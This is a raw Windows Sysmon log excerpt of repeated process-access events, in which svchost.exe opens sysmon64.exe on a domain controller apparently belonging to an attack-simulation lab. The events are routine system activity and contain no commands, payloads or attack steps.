13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 